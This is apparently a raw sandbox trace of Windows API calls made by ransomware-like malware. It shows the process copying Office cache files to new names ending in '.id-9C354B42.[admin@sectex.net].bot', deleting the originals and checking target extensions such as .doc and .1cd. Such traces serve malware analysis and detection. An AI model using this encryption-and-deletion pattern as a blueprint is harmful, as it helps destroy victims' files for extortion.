	[0034.274] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 0x2020
	[0034.274] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0034.274] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0034.275] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.275] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.275] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0034.275] GetLastError () returned 0x0
	[0034.275] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x333, lpOverlapped=0x0) returned 1
	[0034.277] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x340, lpOverlapped=0x0) returned 1
	[0034.278] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0034.278] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0034.278] SetEndOfFile (hFile=0x180) returned 1
	[0034.278] CloseHandle (hObject=0x180) returned 1
	[0034.279] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.279] SetEndOfFile (hFile=0x18c) returned 1
	[0034.279] CloseHandle (hObject=0x18c) returned 1
	[0034.279] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0034.280] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 1
	[0034.280] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79
	[0034.280] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79
	[0034.280] lstrlenW (lpString=".doc") returned 4
	[0034.280] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.280] lstrlenW (lpString=".docx") returned 5
	[0034.280] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1
	[0034.280] lstrlenW (lpString=".pdf") returned 4
	[0034.280] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.280] lstrlenW (lpString=".xls") returned 4
	[0034.280] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.280] lstrlenW (lpString=".xlsx") returned 5
	[0034.280] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1
	[0034.280] lstrlenW (lpString=".ppt") returned 4
	[0034.280] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.280] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79
	[0034.280] lstrlenW (lpString=".zip") returned 4
	[0034.280] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.280] lstrlenW (lpString=".rar") returned 4
	[0034.280] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.281] lstrlenW (lpString=".bz2") returned 4
	[0034.281] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.281] lstrlenW (lpString=".7z") returned 3
	[0034.281] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.281] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79
	[0034.281] lstrlenW (lpString=".dbf") returned 4
	[0034.281] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.281] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79
	[0034.281] lstrlenW (lpString=".1cd") returned 4
	[0034.281] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.281] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79
	[0034.281] lstrlenW (lpString=".jpg") returned 4
	[0034.281] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.281] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79
	[0034.281] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79
	[0034.281] lstrlenW (lpString=".doc") returned 4
	[0034.281] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0034.281] lstrlenW (lpString=".docx") returned 5
	[0034.281] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1
	[0034.281] lstrlenW (lpString=".pdf") returned 4
	[0034.281] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0034.281] lstrlenW (lpString=".xls") returned 4
	[0034.281] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0034.281] lstrlenW (lpString=".xlsx") returned 5
	[0034.281] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1
	[0034.281] lstrlenW (lpString=".ppt") returned 4
	[0034.281] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0034.281] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79
	[0034.281] lstrlenW (lpString=".zip") returned 4
	[0034.281] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0034.281] lstrlenW (lpString=".rar") returned 4
	[0034.281] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0034.281] lstrlenW (lpString=".bz2") returned 4
	[0034.282] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0034.282] lstrlenW (lpString=".7z") returned 3
	[0034.282] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0034.282] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79
	[0034.282] lstrlenW (lpString=".dbf") returned 4
	[0034.282] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0034.282] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79
	[0034.282] lstrlenW (lpString=".1cd") returned 4
	[0034.282] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0034.282] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79
	[0034.282] lstrlenW (lpString=".jpg") returned 4
	[0034.282] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0034.282] lstrcmpiW (lpString1=".chm", lpString2=".bot") returned 1
	[0034.282] lstrlenW (lpString="pss10r.chm") returned 10
	[0034.282] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0034.283] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=27195) returned 1
	[0034.283] CloseHandle (hObject=0x18c) returned 1
	[0034.283] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm")) returned 0x2020
	[0034.283] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0034.283] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0034.283] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.283] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.283] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0034.283] GetLastError () returned 0x0
	[0034.284] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x6a3b, lpOverlapped=0x0) returned 1
	[0034.286] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x6a40, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x6a40, lpOverlapped=0x0) returned 1
	[0034.287] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0034.287] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0034.287] SetEndOfFile (hFile=0x180) returned 1
	[0034.287] CloseHandle (hObject=0x180) returned 1
	[0034.288] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.288] SetEndOfFile (hFile=0x18c) returned 1
	[0034.289] CloseHandle (hObject=0x18c) returned 1
	[0034.289] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0034.289] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm")) returned 1
	[0034.289] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73
	[0034.289] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73
	[0034.289] lstrlenW (lpString=".doc") returned 4
	[0034.289] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1
	[0034.289] lstrlenW (lpString=".docx") returned 5
	[0034.289] lstrcmpiW (lpString1=".docx", lpString2="r.chm") returned -1
	[0034.290] lstrlenW (lpString=".pdf") returned 4
	[0034.290] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1
	[0034.290] lstrlenW (lpString=".xls") returned 4
	[0034.290] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1
	[0034.290] lstrlenW (lpString=".xlsx") returned 5
	[0034.290] lstrcmpiW (lpString1=".xlsx", lpString2="r.chm") returned -1
	[0034.290] lstrlenW (lpString=".ppt") returned 4
	[0034.290] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1
	[0034.290] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73
	[0034.290] lstrlenW (lpString=".zip") returned 4
	[0034.290] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1
	[0034.290] lstrlenW (lpString=".rar") returned 4
	[0034.290] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1
	[0034.290] lstrlenW (lpString=".bz2") returned 4
	[0034.290] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1
	[0034.290] lstrlenW (lpString=".7z") returned 3
	[0034.290] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1
	[0034.290] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73
	[0034.290] lstrlenW (lpString=".dbf") returned 4
	[0034.290] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1
	[0034.290] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73
	[0034.290] lstrlenW (lpString=".1cd") returned 4
	[0034.290] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1
	[0034.290] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73
	[0034.290] lstrlenW (lpString=".jpg") returned 4
	[0034.290] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1
	[0034.290] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73
	[0034.290] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73
	[0034.290] lstrlenW (lpString=".doc") returned 4
	[0034.290] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1
	[0034.290] lstrlenW (lpString=".docx") returned 5
	[0034.290] lstrcmpiW (lpString1=".docx", lpString2="r.chm") returned -1
	[0034.290] lstrlenW (lpString=".pdf") returned 4
	[0034.290] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1
	[0034.291] lstrlenW (lpString=".xls") returned 4
	[0034.291] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1
	[0034.291] lstrlenW (lpString=".xlsx") returned 5
	[0034.291] lstrcmpiW (lpString1=".xlsx", lpString2="r.chm") returned -1
	[0034.291] lstrlenW (lpString=".ppt") returned 4
	[0034.291] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1
	[0034.291] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73
	[0034.291] lstrlenW (lpString=".zip") returned 4
	[0034.291] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1
	[0034.291] lstrlenW (lpString=".rar") returned 4
	[0034.291] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1
	[0034.291] lstrlenW (lpString=".bz2") returned 4
	[0034.291] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1
	[0034.291] lstrlenW (lpString=".7z") returned 3
	[0034.291] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1
	[0034.291] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73
	[0034.291] lstrlenW (lpString=".dbf") returned 4
	[0034.291] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1
	[0034.291] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73
	[0034.291] lstrlenW (lpString=".1cd") returned 4
	[0034.291] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1
	[0034.291] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73
	[0034.291] lstrlenW (lpString=".jpg") returned 4
	[0034.291] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1
	[0034.291] lstrcmpiW (lpString1=".chm", lpString2=".bot") returned 1
	[0034.291] lstrlenW (lpString="setup.chm") returned 9
	[0034.291] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0034.292] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=67190) returned 1
	[0034.292] CloseHandle (hObject=0x18c) returned 1
	[0034.292] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm")) returned 0x2020
	[0034.292] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0034.292] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c
	[0034.292] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.292] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0034.292] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180
	[0034.292] GetLastError () returned 0x0
	[0034.292] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x10676, lpOverlapped=0x0) returned 1
	[0035.224] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x10680, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x10680, lpOverlapped=0x0) returned 1
	[0035.276] ReadFile (in: hFile=0x18c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0035.276] WriteFile (in: hFile=0x180, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0035.276] SetEndOfFile (hFile=0x180) returned 1
	[0035.276] CloseHandle (hObject=0x180) returned 1
	[0035.279] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0035.279] SetEndOfFile (hFile=0x18c) returned 1
	[0035.281] CloseHandle (hObject=0x18c) returned 1
	[0035.281] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0035.281] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm")) returned 1
	[0035.281] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72
	[0035.281] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72
	[0035.281] lstrlenW (lpString=".doc") returned 4
	[0035.281] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1
	[0035.281] lstrlenW (lpString=".docx") returned 5
	[0035.281] lstrcmpiW (lpString1=".docx", lpString2="p.chm") returned -1
	[0035.281] lstrlenW (lpString=".pdf") returned 4
	[0035.281] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1
	[0035.281] lstrlenW (lpString=".xls") returned 4
	[0035.281] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1
	[0035.282] lstrlenW (lpString=".xlsx") returned 5
	[0035.282] lstrcmpiW (lpString1=".xlsx", lpString2="p.chm") returned -1
	[0035.282] lstrlenW (lpString=".ppt") returned 4
	[0035.282] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1
	[0035.282] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72
	[0035.282] lstrlenW (lpString=".zip") returned 4
	[0035.282] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1
	[0035.282] lstrlenW (lpString=".rar") returned 4
	[0035.282] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1
	[0035.282] lstrlenW (lpString=".bz2") returned 4
	[0035.282] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1
	[0035.282] lstrlenW (lpString=".7z") returned 3
	[0035.282] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1
	[0035.282] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72
	[0035.282] lstrlenW (lpString=".dbf") returned 4
	[0035.282] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1
	[0035.282] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72
	[0035.282] lstrlenW (lpString=".1cd") returned 4
	[0035.282] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1
	[0035.282] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72
	[0035.282] lstrlenW (lpString=".jpg") returned 4
	[0035.282] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1
	[0035.282] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72
	[0035.282] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72
	[0035.282] lstrlenW (lpString=".doc") returned 4
	[0035.282] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1
	[0035.282] lstrlenW (lpString=".docx") returned 5
	[0035.282] lstrcmpiW (lpString1=".docx", lpString2="p.chm") returned -1
	[0035.282] lstrlenW (lpString=".pdf") returned 4
	[0035.282] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1
	[0035.282] lstrlenW (lpString=".xls") returned 4
	[0035.282] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1
	[0035.282] lstrlenW (lpString=".xlsx") returned 5
	[0035.282] lstrcmpiW (lpString1=".xlsx", lpString2="p.chm") returned -1
	[0035.283] lstrlenW (lpString=".ppt") returned 4
	[0035.283] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1
	[0035.283] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72
	[0035.283] lstrlenW (lpString=".zip") returned 4
	[0035.283] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1
	[0035.283] lstrlenW (lpString=".rar") returned 4
	[0035.283] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1
	[0035.283] lstrlenW (lpString=".bz2") returned 4
	[0035.283] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1
	[0035.283] lstrlenW (lpString=".7z") returned 3
	[0035.283] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1
	[0035.283] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72
	[0035.283] lstrlenW (lpString=".dbf") returned 4
	[0035.283] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1
	[0035.283] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72
	[0035.283] lstrlenW (lpString=".1cd") returned 4
	[0035.283] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1
	[0035.283] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72
	[0035.283] lstrlenW (lpString=".jpg") returned 4
	[0035.283] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1
	[0035.283] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0035.283] lstrlenW (lpString="Setup.xml") returned 9
